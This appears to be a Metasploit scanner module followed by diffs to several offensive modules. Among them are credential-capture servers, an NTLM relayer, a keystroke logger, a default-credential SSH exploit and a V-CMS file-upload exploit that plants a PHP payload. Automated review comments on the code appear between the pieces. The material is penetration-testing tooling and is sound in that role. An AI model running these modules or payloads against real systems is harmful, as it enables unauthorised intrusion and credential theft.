# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex/proto/ntlm/message'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::WinRM
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'WinRM Authentication Method Detection',
'Version' => '$Revision$',
'Description' => %q{
This module sends a request to an HTTP/HTTPS service to see if it is a WinRM service.
If it is a WinRM service, it also gathers the Authentication Methods supported.
},
'Author' => [ 'thelightcosine' ],
'License' => MSF_LICENSE
)
deregister_options('USERNAME', 'PASSWORD')
end
def run_host(ip)
resp = winrm_poke
return nil if resp.nil?
if resp.code == 401 and resp.headers['Server'].include? "Microsoft-HTTPAPI"
methods = parse_auth_methods(resp)
desc = resp.headers['Server'] + " Authentication Methods: " + methods.to_s
report_service(
:host => ip,
:port => rport,
:proto => 'tcp',
:name => 'winrm',
:info => desc
)
print_good "Negotiate protocol supported" if methods.include? "Negotiate"
print_good "Kerberos protocol supported" if methods.include? "Kerberos"
print_good "Basic protocol supported" if methods.include? "Basic"
else
print_error "#{ip}:#{rport} Does not appear to be a WinRM server"
end
end
end
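Review bot: `resp.headers['Server'].include? "Microsoft-HTTPAPI"` raises NoMethodError when a 401 reply carries no Server header, because `and` only short-circuits on the status check; `resp.headers['Server'].to_s.include?("Microsoft-HTTPAPI")` keeps a missing header on the `else` path. `return nil if resp.nil?` is silent, so a host that never answers produces no output at all; a `vprint_error("#{ip}:#{rport} No response")` there would help when scanning ranges. The `print_good` lines call with no parentheses while the rest of the method uses them; either form is fine, but one style per file reads better.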


@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'Authentication Capture: DRDA (DB2, Informix, Derby)',
'Version' => '$Revision: 14774 $',
'Version' => '$Revision$',
'Description' => %q{
This module provides a fake DRDA (DB2, Informix, Derby) server
that is designed to capture authentication credentials.


@ -182,8 +182,8 @@ class Metasploit3 < Msf::Auxiliary
print_good("[#{cid}] Logging raw keystrokes to: #{@client_cache[cid][:path_raw]}")
end
::File.open( @client_cache[cid][:path_clean], "a") { |fd| fd.puts nice }
::File.open( @client_cache[cid][:path_raw], "a") { |fd| fd.write(real) }
::File.open( @client_cache[cid][:path_clean], "ab") { |fd| fd.puts nice }
::File.open( @client_cache[cid][:path_raw], "ab") { |fd| fd.write(real) }
if nice.length > 0
print_good("[#{cid}] Keys: #{nice}")


@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
def on_request_uri(cli, request)
print_status("Request '#{request.uri}'...")
case request.method
when 'OPTIONS'
process_options(cli, request)
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary
end
exploit()
end
def process_options(cli, request)
print_status("OPTIONS #{request.uri}")
headers = {


@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'HTTP Client MS Credential Relayer',
'Version' => '$Revision:$',
'Version' => '$Revision$',
'Description' => %q{
This module relays negotiated NTLM Credentials from an HTTP server to multiple
protocols. Currently, this module supports relaying to SMB and HTTP.
@ -52,7 +52,6 @@ class Metasploit3 < Msf::Auxiliary
[
'Rich Lundeen <richard.lundeen[at]gmail.com>',
],
'Version' => '$Revision:$',
'License' => MSF_LICENSE,
'Actions' =>
[
@ -93,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary
# Handles the initial requests waiting for the browser to try NTLM auth
def on_request_uri(cli, request)
case request.method
when 'OPTIONS'
process_options(cli, request)
@ -136,7 +135,7 @@ class Metasploit3 < Msf::Auxiliary
parse_args()
exploit()
end
def process_options(cli, request)
print_status("OPTIONS #{request.uri}")
headers = {


@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
'Description' => 'This module emulates a webserver leaking PII data',
'License' => MSF_LICENSE,
'Author' => 'MJC',
'Version' => '$Revision: $',
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://www.metasploit.com'],


@ -22,7 +22,7 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback
def initialize
super(
'Name' => 'CPUID-based Context Keyed Payload Encoder',
'Version' => '$Revision: 1$',
'Version' => '$Revision$',
'Description' => %q{
This is a Context-Keyed Payload Encoder based on CPUID and Shikata Ga Nai.
},


@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
['OSVDB', '61284']
],
'DefaultOptions' =>
{
@ -48,6 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
['Apple iOS', { 'accounts' => [ [ 'root', 'alpine' ], [ 'mobile', 'dottie' ]] } ],
],
'Privileged' => true,
'DisclosureDate' => "Jul 2 2007",
'DefaultTarget' => 0))
register_options(


@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
'PrependEncoder' => "\x83\xec\x7f",
'DisableNops' => 'True',
},
'Platform' => 'BSD',
'Platform' => 'bsd',
'Arch' => ARCH_X86,
'Targets' =>
[


@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
['CVE', '2011-4862'],
['OSVDB', '78020'],
['BID', '51182'],
['EDB', 18280]
['EDB', '18280']
],
'Privileged' => true,
'Platform' => 'bsd',


@ -6,11 +6,13 @@
##
require 'msf/core'
require 'msf/core/exploit/php_exe'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info={})
super(update_info(info,
@ -28,8 +30,8 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'Author' =>
[
'AutoSec Tools', #Initial discovery
'sinn3r' #Metasploit
'AutoSec Tools', # Initial discovery
'sinn3r' # Metasploit
],
'References' =>
[
@ -42,15 +44,12 @@ class Metasploit3 < Msf::Exploit::Remote
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'EXITFUNC' => "none"
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
['V-CMS 1.0', {}],
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
[ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
],
'Privileged' => false,
'DisclosureDate' => "Nov 27 2011", #When the ticket was created
@ -75,15 +74,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
def on_new_session(client)
if client.type == "meterpreter"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
client.fs.file.rm(@payload_name)
else
client.shell_command_token("rm #{@payload_name}")
end
end
def exploit
peer = "#{rhost}:#{rport}"
@ -91,18 +81,13 @@ class Metasploit3 < Msf::Exploit::Remote
base << '/' if base[-1,1] != '/'
@payload_name = "#{rand_text_alpha(5)}.php"
p = %Q|<?php
#{payload.encoded}
?>
|
p = p.gsub(/^\t\t/, '')
p = get_write_exec_payload(:unlink_self=>true)
post_data = "------x\r\n"
post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"\r\n"
post_data << "Content-Type: image/gif\r\n"
post_data << "\r\n"
post_data << p
post_data << p + "\r\n"
post_data << "------x--\r\n"
print_status("#{peer} Uploading payload: #{@payload_name}")
@ -133,4 +118,4 @@ class Metasploit3 < Msf::Exploit::Remote
handler
end
end
end
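Review bot: `@payload_name = "#{rand_text_alpha(5)}.php"` is still an instance variable, but with on_new_session removed its only visible readers are the multipart filename and the status line inside `exploit` itself; unless it is read elsewhere in the file, a local `payload_name` would state that scope. The switch to `get_write_exec_payload(:unlink_self=>true)` is undocumented at the call site; a short comment naming what the PhpEXE helper produces for the two targets would explain why the hand-built `<?php ... ?>` wrapper and its `gsub` went away. The exploit method begins before this hunk and continues past it.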
